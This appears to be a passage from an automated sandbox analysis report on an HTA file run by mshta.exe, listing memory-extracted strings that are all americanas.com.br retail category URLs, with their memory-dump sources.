00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixer
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9A6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/processador-de-alimentos?chave=pfm_hm_tt_1_0
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.000000000929B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateis
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismeta.largemeta
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776665424.000000000C11F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666676210.000000000C132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_hm_tt_1_0_portateis
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_home_portateis_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/almofada-natalina
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natal
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natalIe
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natalYf
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/bolas-de-natal
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/enfeites-para-arvore
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/enfeites-para-arvoreo
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/f/loja-Americanas
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/presepio
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalina
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinahttps://images-amer
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/velas-e-casticais-natalinos
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menu
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2663684989.00000000093D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esporte
